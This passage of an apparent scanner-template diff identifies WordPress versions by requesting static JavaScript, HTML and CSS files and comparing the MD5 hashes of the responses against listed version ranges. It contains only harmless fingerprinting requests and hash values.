"(\"b3f3e37cff43d90e2fec656b52f1b67a\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"813a9c698d9150d198f438a7928bfa29\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"3de5b82cc08338afd1923941bdb0c86f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/pastetext.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"e8598b664a0f4578a88c7c34e46c029d\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - 
"(\"7e2ab5dcd71147801312f12d9ad99d53\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"765a36671dc31ddf23bda7193e646842\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a5844c99bd289dcaf5561ae0f8ff0fc9\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"2d9e18b42ea47992ba2aa790a58e25aa\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c49497ac4150a78c561f240ae16fc47b\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"892be984236242a11a6d4490a978d754\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b82c2ee67a44ac0915ba6693ab622a36\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"a1b57674240bc9e8f76de47bf4b6f92a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"47b91f20f6c5381f52a266da9fb87508\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"0aebc1e2f8890d774f61971091e3eba3\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"0185613272e7c57f43e9e021567c8030\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4895645731e0148b7e730eff6b78a4e0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/pasteword.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"75afde509924223eab0c0b2535141192\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7db62fe5ecea992a47ad567a59fddf4a\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"140c8639b95b5985387314ff5c538e20\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a6d0b98d7aab9dc483a865ee49e308f1\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4fe34536718be4bcfa0e6e8f6ad9e9ae\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"d5836a7e2bb8b61683d6d2a1815e446d\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"60d6e9aaf1aafe06b85da92df1a486d3\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - 
"(\"d958f3b1931464c30d68b499231f9d63\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7c601ec4eeee22f414ae093120b62bd0\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"62a7fcdff65cdfb1ac81160d49abd560\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"bc4d612287743f988a3f20fa66d2e611\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"002daa009655fa5e52d8374c25b7b95e\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c5e287e22909f9945c1bf65ceb7e66aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"15134339e36472281b8a1626233f747d\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"10a81b39a4bc07a7e804ae1ef9f66956\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"38b4fcfb8b026060b40c82087cd4082d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"850959bac9b9257f66817c94fa35df27\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"89f4e23300ce29d55b985a37f61d95f0\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"994124fa3bbad1cfc9fb9900c10a6b00\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"d1ef8dc9ab08b7a58c5d96a56145ab4e\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"893f6c4038f293618722b42f4bf4c8e3\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"e1be69ab8e117a7f82952dfd9c2375e4\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"f45368a75b1c1879d5b0f5f164045e60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/fullscreen.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"d21fc65b8aade703572c6f396e475118\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"65798ace2436ed31098d3b9a58b8c3a5\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - 
"(\"7a6c199ec99e3a7b7f20e1076e14f06f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"f7ed49c39b482daac4809bc3bd79f4a8\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"86b8cb7ae6b53d825d0c49798d842445\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"626f666036f145cefe0013847c35bf17\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"f6429e142030a88e1dec026f53c600e6\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"ca9817da53d28adaee86603ca94d69dc\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9f801bc7c58adb76341114ff20caa43a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"291a2370a72b46ff6b94722d4807b64f\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"99a680170eaa55f849619048204f74d4\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"f8d9aec34e586ebb299ed43a39b7f7b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"cbfebda03eef4bd608a86827948c4224\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"89c9d4511cd7b90c00fdd9aa30c3bc18\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8b3524554889bac4122fe6e15b95cdc0\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"bfaaa63c2867a7c1aa80783e423a9b87\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"047a9618f11ee697eec716c88dedd8e8\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"a7b58f0ddb0e55f591c00f06e21ada67\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"490ea06c259c55ed8364450ecb02852b\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"6d22dd7115baffc34269f0eef6b618ba\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"49982a4eed623c011535b63e82aadaef\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - 
"(\"9d3f90a4a9531d6aeedac9a0ed9309da\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"c6753be1486843060289ac3b3940e2cf\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"d2fdd7ee581e86820a4c57389464bd21\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/template.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"31a49baf85e588fb217390f950e775e5\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6deeea3f92e1992d587c08dc51cfd091\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"987df7a126c458f5394eb711c27f5e4d\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"876e269481446c34166f18b0bf0faa9b\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"b9d081d573fd166147d32c9f180a1293\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"67594d378e290c4c935289786f89278c\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"9145ca8842ce27e7a25b4821a710c520\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"2b2ca7c291b8b1b867b44a6e5bca7991\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7d0fa8e3669dbb890fbdba95d21d432a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"d45f680745ad8747b5a5120230759c26\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"7ef20f66074ae548be36c37667e65e52\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"c01f15cd357d8dba4610c3eae6321930\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/editor_plugin.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"5ad7db86c5008f98ec135595db4a4973\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9ce4c5f8e09f3b86b7b62abb19f32b09\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"81e16046103fb1776f30838d2bb4a378\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - 
"(\"cc97fbc2bc892884a3fc3e3cab3b9aba\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"bcd5c851ca50eee87904b410c13c6d8c\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"8711a73c0d6d417b635bf646dc5091c8\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9beecec5d5cbdc86bee17eadc0f5a545\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"8b13bc1307b4c9d06122346c44b5e716\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"f6c1ba01ff7b8fb600c8a906a573c0ab\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"d3eca453edb0893447a1e993ce05a0f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/media.htm" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"45d4c170a335c40f431569802a2f0e18\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"d8ada489c50c283c5732ff06aa72b4f8\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0470b34fb0c140d8d917ada27d885b87\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"0a95f87ca9fc5dd7c8e91ed7e2a2b45d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"d17ac310b24242e2b2cc14ca08a38385\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"a8fb1a8e0aa8ac0d2b06a8a4625908c4\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"03453eabdffe90cf7e9406d618b78c10\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"2e2426d4850c4c7040424234f0b24396\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"bf4c1c5ac6d22a90dfedfbab79fe1e03\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"e2a663d0abbf3c98e9c80e2df3d575a9\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"65c3b3ce2f72ce3436d6cda2ef852668\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen.js" + matchers: + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"669dfa41fd076fadd200112960a46fcb\" == md5(body))" + - 
type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"781b0a7f92ace4c740bebd0ba2ec9cc5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b16b5388bafc33588edbf6d8a7d83932\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d3b194e346461893b6366e6e9992e5c5\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0d4afd93d02b73aed209f73e4d25469a\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"24644a8300d7318eefe876c659e57b3d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"4fa94e2fe8af8edc6ea416e1970c7cd8\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"5320e05e4751ce9c37efade68a6c0b48\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"5675f7793f171b6424bf72f9d7bf4d9a\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"7b423e0b7c9221092737ad5271d09863\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/skin.ie7.min.css" + matchers: + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"ab035d1d6fd828a1530ee6b2df22e70a\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"1ab68a0c95f250189323b986a707f70a\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"19d42e7af34d7880b12e6a40d74b0a89\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"58490013777e57ebaab84893713280c1\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"cea6608407da4b0d07f4bdad387059c2\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"f85aec87569380b36901c67b3c2fad81\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.29 + dsl: + - "(\"16b6170794ca6d5f7fd29073d4a5477f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"09c1ba458c1670a68acbe8004e1c4b14\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/handlers.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"220adfeb811cbe402367392b44d5fbfd\" == md5(body))" + - type: dsl + name: 3.9 - 
4.7.19 + dsl: + - "(\"14b2d04fdb85bc1f171cf3dfb2987dca\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.8.35 + dsl: + - "(\"c5d6929ea46dc1bb4ef8bffc17b3e819\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.1 + dsl: + - "(\"793ff9921f096583ba52f8606ec79f4c\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"44b4f7cfec54b7fc8410a383257af538\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"784d62b41691c6c9e1d4f49bd18a9b20\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"df9ce8622e62e80c1a80613e5cb1b25b\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"b22b8b21967e1509304c76e13c3c5047\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"d7c136a3e2143f53b37803bb894c4250\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"fd1fdc830e7c1c1e4b6d3f0b29a2da05\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"150e7f1df4bcb8695a6330aad02cc9bc\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"5d1ea480360a4139c65308bc27ccd742\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a9c61c5f04847006bfd229057721184a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"4d16bff72b33fb1e11fc960aa4a4a23e\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"c2c1ec2ac323cd308b2dc6d58370f514\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce_popup.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"41116cb9eb54da596cb42468d2b5d69d\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.7.19 + dsl: + - "(\"dbe62082422b75d89ecb983409ec966d\" == md5(body))" + - type: dsl + name: 4.3 - 4.5 + dsl: + - "(\"83efe579f26f25ac80fe550402db2467\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"d84233dd293717f0a07b558b2fe38f56\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.1 + dsl: + - "(\"692f8e861bafa31fbf1b3805b4b0d7d3\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - 
"(\"38dbcc925529368812f5c2fbcb389616\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"5a318277fedf491a0301e177a9ef10b3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"554bc76c70351187f4ce05ddc012aaed\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"9a9c125814b9715982d246a1ee78084f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"677d2f88ae991728c80ef15d112652b2\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"5906da6296b5d6dc28cfb4a9cd2dd295\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"d9e6163fd6707bf0582635247bc17a5c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"cda99de2ed0201e818ecdab304aa8a2a\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"7435f4fa6463572035c9c212558491f9\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"c96b7c2981d7b5c253812487be5cd71a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"f539ddea7e23c2511166429ea78a2908\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"8a6b281d4baa3efbfa5c3690d7561a25\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"2e1d0f50dc25586e43e6609f2ef9cc0e\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"628e60ccfa9b0e77822a5359f87d1f3b\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"4237af4931ba3003048f8eb5b98364c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"1acdd0cd523695bd920ccc418b0678c9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"acf45356a0e8d21b985372c641109ae7\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"e4462639dd52885cfdf136ff15956fed\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.2 + dsl: + - "(\"5b79b0ee9feabb912f6e3a9134eef5f7\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"137858b0d72b5f4637d414461f445008\" == 
md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f58df83b99c2e5bf0c6fe5f6313450f0\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"964ac7bf64ae9fddf0240fd1e3a04b67\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"3a083b99f4d138b72547e42f77027320\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"0f8be35f8c316861694298d218c11f5e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a98b282dc6d835e7c63db94f2bc15a38\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"e8e92de96b2688db7cbb361d0753831a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/text-widgets.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"28f9be51cafa06930392acb005b8c824\" == md5(body))" + - type: dsl + name: 4.8.1 + dsl: + - "(\"3651b41fcb718e55e0de3a29212d71ea\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"ccbae9a28443a1ad1b5bbee115dc045b\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"32b7abeff170db2b017381efe0b78fad\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2fb0dbe77a00686b5e5b3fd2f3a7858f\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"16a54defdaf982da0cabd83ec44e236e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"ddc49ad0e4b146cc8ff73d976f1298bb\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ef12ac13dfb8607a2d05135f00ceac5a\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"90dd09a79d1265f3d0601ffe37c97a01\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.2 + dsl: + - "(\"ee346cf79cc3fc6f9757e3e8e716b5f3\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"a57538e3c37236da55c1f1da474e015e\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"504d2cee82879a8d64df784d9f2e9928\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - 
"(\"ad4b907b479f8a0742a4ca9af3b90857\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"a1ee27ad90d9bd862c162080115b1890\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"974abbb6edce586b8aabe3731d19ef71\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"5a881bd372a52591d5972df05e9fab63\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bd3c01dbc3b971ea143a6a4628400dba\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"2aae979a0e8bced7b6483b8671072ebd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview.min.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"71f5d65a2add0646814684e11b1a3af9\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"c2f8e7dbb3732123437acde95db6cfb8\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"b9f62643c2bd209ffd28c665d16c7d3f\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"8eb16dc701cf206c22ab40082d814cb5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f7b940cf84777e434b486f6837657263\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"a05e8cd6f93d192e1c7232acf2544d86\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2f60c6d976a975a85fd005c7759e7cbf\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"b8e325486884be9894b081ebac0d54ad\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6978871856b8ff6629abcca584235417\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"ca3d5ac7ffbf318c461a06c42362e671\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b06bc1c2d6c000215e645286a01295f3\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"37964f44f324f359533e4ce7693e0636\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6e3f2d3422ec9af1707e3b2d3dee2406\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - 
"(\"f4d0c657b387dd0a32fa0f98d7cf5b04\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"1ad333686be390fb54544cb0c3214c1d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"7a6543b3b6d26ec558fac675836a565b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ed42144eb1409979845f15c50b90f0f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor-expand.min.js" + matchers: + - type: dsl + name: 4.6.1 - 5.1.8 + dsl: + - "(\"4500034a26d73b737f761adcc7ef5c79\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"2003869bb96b00cd78b008bd667dd57d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"eb145a2ecb2bb7e11fb759364301c88b\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"0deb56202e03c193c2584eba6874be49\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"78a1af5d700f31280bfc20621bce8e50\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"09470901ca55f639595600af00a70d0c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"89eab3c62d8a7e8d143ed648c593d3fd\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"4e78a0327caee92c94c119cbcdcdacf0\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"32c49e20a3451da0f1b76d1d218c684c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cec8ae46f57c71d64d459efcb897aac5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1ce055e767e96eeef80e5eb33bf2beb6\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"0d4ab764b7b09f2938b583fbd53fdce1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/plugin.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ef6e5669ee3af739f33eaf8c092edf87\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"049a123027cc7ed6f5cb6e567b631746\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - 
"(\"c3c8b527b2177fe3c1065d5812b86f48\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"db762695fd5a8d769b6a6002451db2bc\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3956816511219402805b87ed3d6c1965\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.23 + dsl: + - "(\"e2a1ffd8d68a5695a771d5c873539976\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"1b1e5e7e85593bbba4e4f107b6371349\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"42f0fd8dc00634c3bd92d67f983167c6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e2622abed0990e5fa1c0a46ec9857c81\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"ed367f421e178c90f4c3bbd81479d79d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"ae6c8c67d69d6b4bfddbbe0383c5c141\" == md5(body))" + - type: dsl + name: 4.1.5 - 4.1.32 + dsl: + - "(\"65ba47e11a2641fd8126987586543f6c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.4 + dsl: + - "(\"cccb0acc830cee3e5a2626dc44f6b2e3\" == md5(body))" + - type: dsl + name: 4.0.5 - 4.0.32 + dsl: + - "(\"f3aba863d0e75ae9baededd390b5c27a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.4 + dsl: + - "(\"aaaa5adacaf254b8ed29827822052b96\" == md5(body))" + - type: dsl + name: 3.9.6 - 3.9.33 + dsl: + - "(\"e9a3b52c3321a947b3675e9452523bed\" == 